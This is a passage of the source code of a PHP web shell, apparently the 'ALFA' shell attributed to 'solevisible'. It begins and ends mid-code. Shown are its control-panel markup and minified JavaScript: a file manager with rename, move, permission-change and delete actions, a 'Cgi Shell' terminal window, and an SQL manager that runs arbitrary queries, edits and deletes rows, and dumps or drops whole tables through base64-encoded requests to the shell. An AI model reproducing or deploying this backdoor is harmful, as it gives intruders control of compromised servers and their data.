none;\'>Donate Us !</a></span> <span style=\'letter-spacing: 2px;color: #dfff00;\'>solevisible[at]gmail.com</span> <span><a style=\'color: #ff6060;text-decoration: none;\' target=\'_blank\' href=\'https://telegram.me/solevisible\'>@solevisible</a></span></div></td>\r\n</tr>\r\n</table>\r\n</div>\r\n\r\n<div id=\'options_window\' style=\'background:rgba(0, 0, 0, 0.69);\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"options_window\\");\'></div><div onClick=\'editorClose(\\"options_window\\");\' class=\'close-button\'></div></div></div><div style=\'height:100%;\' class=\'content_options_holder\'><div class=\'options_tab\'></div><div class=\'options_content\' style=\'margin-left:14px;margin-right:30px;background:#000;overflow:auto;\'></div></div></div></div>\r\n\r\n<div id=\'database_window\' style=\'background:rgba(0, 0, 0, 0.69);\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'>Sql Manager</div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"database_window\\");\'></div><div onClick=\'editorClose(\\"database_window\\");\' class=\'close-button\'></div></div></div><div class=\'content_options_holder\' style=\'margin-left:14px;margin-right:30px;background:#000;max-height:90%;\'><div class=\'sql-tabs\'></div><div class=\'sql-contents\' style=\'max-height: 85vh;\'></div></div></div></div>\r\n\r\n<div id=\'cgiloader\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"cgiloader\\");\'></div><div onClick=\'editorClose(\\"cgiloader\\");\' class=\'close-button\'></div></div></div><div id=\'cgiframe\' style=\'position:relative;margin-left:14px;margin-right:30px;\'><div class=\'terminal-tabs\'></div><div style=\'height:90%;\' class=\'terminal-contents\'></div></div></div></div>\r\n<div id=\'editor\' style=\'display:none;\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'editor-path\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"editor\\");\'></div><div onClick=\'editorClose(\\"editor\\");\' class=\'close-button\'></div></div></div><div onclick=\'historyPanelController(this);\' mode=\'visible\' class=\'history-panel-controller\'><<</div><div class=\'editor-explorer\'><div class=\'hheader\'><div class=\'history-clear\' onclick=\'clearEditorHistory();\'>Clear all</div><div class=\'hheader-text\'>History</div><div class=\'editor-search\'><input type=\'text\' style=\'text-align:center;\' id=\'search-input\' placeholder=\'search\'></div></div><div class=\'history-list\'></div></div><div class=\'editor-modal\'><div class=\'editor-body\'><div class=\'editor-content\'><div class=\'editor-tabs\'></div><div class=\'editor-content-holder\'></div></div></div></div></div></div>\r\n<div id=\'update-content\'></div>\r\n<div id=\'database_window-minimized\' onclick=\'showEditor(\\"database_window\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div class=\'minimized-text\' style=\'top: 15px;\'>Database</div></div></div>\r\n<div id=\'options_window-minimized\' onclick=\'showEditor(\\"options_window\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 4px;\' class=\'minimized-text\'>Options</div></div></div>\r\n<div id=\'editor-minimized\' onclick=\'showEditor(\\"editor\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 2px;\' class=\'minimized-text\'>Editor</div></div></div>\r\n<div id=\'cgiloader-minimized\' onclick=\'showEditor(\\"cgiloader\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 12px;\' class=\'minimized-text\'>Cgi Shell</div></div></div>\r\n<div id=\'rightclick_menu\'>\r\n  <a target=\'_blank\' href=\'\' name=\'newtab\'><img src=\\"http://solevisible.com/icons/menu/newtab.svg\\"> Open in new tab</a>\r\n  <a target=\'_blank\' href=\'\' name=\'link\'><img src=\\"http://solevisible.com/icons/menu/link.svg\\"> Open file directly</a>\r\n  <a href=\'javascript:void(0);\' name=\'download\'><img src=\\"http://solevisible.com/icons/menu/download2.svg\\"> Download</a>\r\n  <a href=\'\' name=\'view\'><img src=\\"http://solevisible.com/icons/menu/view.svg\\"> View</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'view_archive\'><img src=\\"http://solevisible.com/icons/menu/view.svg\\"> View Archive</a>\r\n  <a href=\'\' name=\'edit\'><img src=\\"http://solevisible.com/icons/menu/edit.svg\\"> Edit</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"move\\");\' ftype=\'\' path=\'\' fname=\'\' href=\'\' href=\'\' name=\'move\'><img src=\\"http://solevisible.com/icons/menu/move.svg\\"> Move</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"copy\\");\' ftype=\'\' path=\'\' fname=\'\' href=\'\' name=\'copy\'><img src=\\"http://solevisible.com/icons/menu/copy.svg\\"> Copy</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"rename\\");\' ftype=\'\' path=\'\' fname=\'\' name=\'rename\'><img src=\\"http://solevisible.com/icons/menu/rename.svg\\">  Rename</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"modify\\");\' ftype=\'\' path=\'\' fname=\'\' name=\'modify\'><img src=\\"http://solevisible.com/icons/menu/time.svg\\">  Modify</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"permission\\");\' name=\'permission\'><img src=\\"http://solevisible.com/icons/menu/key.svg\\"> Change Permissions</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'compress\'><img src=\\"http://solevisible.com/icons/menu/resize.svg\\"> Compress</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'extract\'><img src=\\"http://solevisible.com/icons/menu/increase.svg\\"> Extract</a>\r\n  <a href=\'javascript:void(0);\' name=\'delete\'><img src=\\"http://solevisible.com/icons/menu/delete.svg\\"> Delete</a>\r\n</div>\r\n<div id=\\"filesman-tab-full-path\\"></div>\r\n<div id=\'alert-area\' class=\'alert-area\'></div>\r\n<div class=\'cl-popup-fixed\' style=\'display:none;\'>\r\n\t<div id=\'shortcutMenu-holder\'>\r\n\t\t<div class=\'popup-head\'></div>\r\n\t\t\t<form autocomplete=\'off\' onSubmit=\'return false;\'>\r\n\t\t\t\t<label class=\'old-path-lbl\'></label>\r\n\t\t\t\t<div style=\'overflow: hidden;white-space: nowrap;text-overflow: ellipsis;\' class=\'old-path-content\'></div>\r\n\t\t\t\t<label style=\'margin-top:10px;\' class=\'new-filename-lbl\'>New file name</label>\r\n\t\t\t\t<input type=\'text\' name=\'fname\'>\r\n\t\t\t\t<div class=\'perm-table-holder\'>\r\n\t\t\t\t\t<table>\r\n\t\t\t\t\t   <tbody>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td><b>Mode</b></td>\r\n\t\t\t\t\t         <td>User</td>\r\n\t\t\t\t\t         <td>Group</td>\r\n\t\t\t\t\t         <td>World</td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Read</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ur\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gr\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'wr\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Write</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'uw\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gw\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ww\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Execute</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ux\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gx\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'wx\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Permission</td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'u\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"u\\", [\\"u\\"]);\'></td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'g\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"g\\", [\\"g\\"]);\'></td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'w\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"w\\", [\\"w\\"]);\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t   </tbody>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\r\n\t\t\t</form>\r\n\t\t<div class=\'popup-foot\'>\r\n\t\t\t<button style=\'background: #2b5225;\' name=\'accept\' action=\'\' onclick=\'alfaPopUpDoAction(this);\'></button>\r\n\t\t\t<button style=\'background: #9e2c2c;\' onclick=\'d.querySelector(\\".cl-popup-fixed\\").style.display=\\"none\\";\'>Cancell</button>\r\n\t\t</div>\r\n\t</div>\r\n</div>";?>\r\n<script>\r\nfunction alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\\\[\\\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\\\[\\\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href=\'javascript:void(0);\' onclick=\'g(\\"FilesTools\\",null,\\""+s+\'","download");\\\'><span>Download: \'+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r=\'<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="\'+a+\'" placeholder="Filter Table" target=".cls-\'+i+\'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>\';for(var o in e)null!=e[o]&&(r+="<li><div class=\'block\'><i></i><b></b></div><div class=\'tables-row\'><input type=\'checkbox\' name=\'tbl[]\' value=\'"+e[o].name+"\'>&nbsp;<a class=\'db-opt-id\' db_target=\'"+i+"\' db_id=\'"+a+"\' href=\'javascript:void(0);\' onclick=\\"alfaLoadTableData(this, \'"+e[o].name+"\')\\"><span class=\'mysql_tables\' style=\'font-weight:unset;\'>"+e[o].name+"</span></a>"+(l?" <small><span style=\'font-weight:unset;\' class=\'mysql_table_count\'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+=\'</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="\'+a+\'" class="db-opt-id" target=".cls-\'+i+\'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="\'+a+\'" target=".cls-\'+i+\'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="\'+a+\'" class="db-opt-id" db_target="\'+i+\'" target=".cls-\'+i+\'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>\',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style=\'padding-left: 50px;\'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style=\'padding-left: 50px;\'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name=\'"+e.columns[u].name+"\'><option value=\'=\'>=</option><option value=\'!=\'>!=</option><option value=\'>\'>&gt;</option><option value=\'>=\'>&gt;=</option><option value=\'<\'>&lt;</option><option value=\'<=\'>&lt;=</option><option value=\\"= \'\'\\">= \'\'</option><option value=\\"!= \'\'\\">!= \'\'</option><option value=\'LIKE\'>LIKE</option><option value=\'LIKE %...%\'>LIKE %...%</option><option value=\'NOT LIKE\'>NOT LIKE</option><option value=\'REGEXP\'>REGEXP</option><option value=\'REGEXP ^...$\'>REGEXP ^...$</option><option value=\'NOT REGEXP\'>NOT REGEXP</option><option value=\'IN (...)\'>IN (...)</option><option value=\'NOT IN (...)\'>NOT IN (...)</option><option value=\'BETWEEN\'>BETWEEN</option><option value=\'NOT BETWEEN\'>NOT BETWEEN</option><option value=\'IS NULL\'>IS NULL</option><option value=\'IS NOT NULL\'>IS NOT NULL</option></select></td><td><input type=\'"+p+"\' name=\'"+e.columns[u].name+"\'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td><select name=\'sel_"+e.columns[u].name+"\'>"+f+"</select></td><td><input name=\'value_"+e.columns[u].name+"\' type=\'text\' value=\'"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"\'></td><td><button col_name=\'"+e.columns[u].name+"\' tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlAlterTbl(this);return false;\'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name=\'"+e.columns[u].name+"\' rows=\'5\'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type=\'number\' name=\'"+e.columns[u].name+"\' value=\'\'>";break;default:m="<input type=\'text\' name=\'"+e.columns[u].name+"\' value=\'\'>"}r+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style=\'margin-left:20px;\'><button tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlUpdateRow(this, \\"insert\\");return false;\'>Insert</button></div><div class=\'mysql-insert-result\'></div>",o+="</table><div class=\'mysql-structure-qres\'></div>",n+="</table><div style=\'padding-left: 384px;margin-top: 15px;\'><button tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlSearch(this);return false;\'>Search</button></div>",e.pages>0){l+="<span style=\'cursor:pointer;\' db_id=\'"+i+"\' onclick=\'alfaMysqlChangePage(this,1);\'><<</span> <span> page: </span> <select tbl_name=\'"+t+"\' db_target=\'"+a+"\' name=\'mysql-q-pages\' db_id=\'"+i+"\' class=\'db-opt-id\' onchange=\'alfaMysqlChangePage(this);\' pages=\'"+e.pages+"\'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style=\'cursor:pointer;\' db_id=\'"+i+"\' onclick=\'alfaMysqlChangePage(this,2);\'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name=\'"+e[c].col+"\' rows=\'5\'>"+e[c].value+"</textarea>";break;case"input":u="<input type=\'"+e[c].type.type+"\' name=\'"+e[c].col+"\' value=\'"+e[c].value+"\'>"}s+="<tr><th style=\'text-align: left;\'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style=\'margin-left:20px;\'><button col_key=\'"+l+"\' key=\'"+r+"\' tbl_name=\'"+o+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlUpdateRow(this, \\"edit\\");return false;\'>Update</button></div><div class=\'mysql-update-result\'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+=\'<optgroup label="\'+t[l].key+\'">\',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" 